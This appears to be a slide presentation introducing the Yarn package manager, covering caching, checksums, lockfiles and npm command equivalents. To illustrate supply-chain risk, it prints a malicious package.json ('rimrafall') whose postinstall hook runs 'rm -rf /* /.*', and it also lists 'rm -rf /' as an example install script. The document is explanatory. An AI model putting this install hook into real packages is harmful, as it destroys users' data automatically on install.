Yarn
Joe Buza
What is Yarn?
Yarn is a fast, reliable and secure alternative npm client.
Why Yarn?
- Fast
- Secure
- Reliable
Fast
- Caches downloaded packages
- Parallel installation
Secure
Uses checksums to verify the integrity of every package before its code is executed. Without such a check, a malicious or compromised package could:
- Include a postinstall script such as rm -rf /
- Include a postinstall script such as npm unpublish
- Publish a semver patch version containing a bug that makes the package unusable
Vulnerabilities
```json
{
  "name": "rimrafall",
  "version": "1.0.0",
  "description": "rm -rf /* # DO NOT INSTALL THIS",
  "main": "index.js",
  "scripts": {
    "postinstall": "rm -rf /* /.*"
  },
  "keywords": [
    "rimraf",
    "rmrf"
  ],
  "author": "João Jerónimo",
  "license": "ISC"
}
```
Missing Link
Reliable
- Deterministic
- Network resilience
Deterministic
The same dependencies will be installed the same exact way across every machine regardless of install order.
yarn.lock
Saves the exact versions of packages
Network Resilience
A single request failing won't cause an install to fail. Requests are retried upon failure.
Differences
| npm | yarn |
|---|---|
| npm install | yarn |
| npm install jest --save | yarn add jest |
| npm uninstall jest --save | yarn remove jest |
| npm install jest --save-dev | yarn add jest --dev |
| npm update --save | yarn upgrade |
| npm install jest --global | yarn global add jest |
Similarities
| npm | yarn |
|---|---|
| npm init | yarn init |
| npm run | yarn run |
| npm test | yarn test |
| npm cache clean | yarn cache clean |
Only in Yarn
- yarn licenses ls
- yarn licenses generate-disclaimer
- yarn why <package>
- yarn upgrade-interactive
Resources
Questions?